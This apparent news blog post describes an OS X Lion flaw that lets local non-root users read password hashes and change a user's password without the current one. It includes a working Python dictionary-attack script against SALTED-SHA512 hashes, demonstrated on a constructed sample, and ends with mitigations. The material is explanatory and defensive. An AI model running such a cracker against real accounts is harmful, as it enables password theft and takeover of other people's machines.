A new post on the security blog Defense in Depth reveals a serious security flaw in OS X Lion that could let anyone with local access to your machine recover an administrator's password and change it.
According to the report, even non-root users in Lion can read other users' password hash data, and a very simple Python script can then recover the password from that hash by testing candidate passwords against it offline.
Unfortunately, the situation only gets worse: Lion does not ask for the current password before changing the password of the logged-in user, so a single Terminal command is enough to set that user's password, administrator accounts included, to whatever the attacker chooses. The exploit requires direct access to the Mac, that is, a local session with access to Directory Services; the report does not describe it as remotely exploitable.
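The hash-cracking step described above, as an added example that is not code from the original post or from the Defense in Depth report. It assumes the Lion storage format for local accounts, SALTED-SHA512, in which the stored value is a 4-byte salt followed by SHA-512(salt || password); the sample hash and the wordlist are constructed here for illustration. Because the hash is a single fast SHA-512 round per guess, an attacker who can read it only needs a wordlist, which is why reading it as a non-root user is the serious part of the flaw.

```python
import hashlib
import os
from typing import Iterable, Optional, Tuple

# Lion-style SALTED-SHA512 layout (assumed format): 4-byte salt || SHA-512(salt || password)
SALT_LEN = 4
DIGEST_LEN = hashlib.sha512().digest_size  # 64 bytes


def make_salted_sha512(password: str, salt: Optional[bytes] = None) -> bytes:
    """Build a stored value the way Lion would: salt prefix plus SHA-512 over salt||password."""
    if salt is None:
        salt = os.urandom(SALT_LEN)
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be exactly %d bytes" % SALT_LEN)
    return salt + hashlib.sha512(salt + password.encode("utf-8")).digest()


def split_salted_sha512(blob: bytes) -> Tuple[bytes, bytes]:
    """Separate a stored value into (salt, digest), rejecting anything of the wrong length."""
    if len(blob) != SALT_LEN + DIGEST_LEN:
        raise ValueError("expected %d bytes, got %d" % (SALT_LEN + DIGEST_LEN, len(blob)))
    return blob[:SALT_LEN], blob[SALT_LEN:]


def crack_salted_sha512(blob: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: one SHA-512 per candidate, compared against the stored digest.

    Returns the matching candidate, or None if no word in the list matches.
    """
    salt, digest = split_salted_sha512(blob)
    for candidate in wordlist:
        if hashlib.sha512(salt + candidate.encode("utf-8")).digest() == digest:
            return candidate
    return None


# Constructed sample: what a stored value would look like for a user with a weak password.
SAMPLE_SALT = bytes.fromhex("0a1b2c3d")
SAMPLE_HASH = make_salted_sha512("letmein1", SAMPLE_SALT)
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "letmein1", "abc123"]


def demo() -> Optional[str]:
    """Run the attack against the constructed sample; returns 'letmein1'."""
    return crack_salted_sha512(SAMPLE_HASH, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print("recovered password:", demo())
```

The salt only stops a precomputed table from covering every user at once; it does nothing against a per-user wordlist run, which is what the report's script does. A slow, iterated KDF (what Apple moved to in later releases) is what makes this step expensive, not the salt.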
Disabling automatic log-in, requiring a password on wake from sleep and from the screensaver, and disabling guest accounts are all recommended to help prevent this type of compromise. Note that these measures only limit who can get a local session on the machine; they do not change the underlying hash exposure, which needs a fix from Apple. Hat-tip to BGR for sharing this report.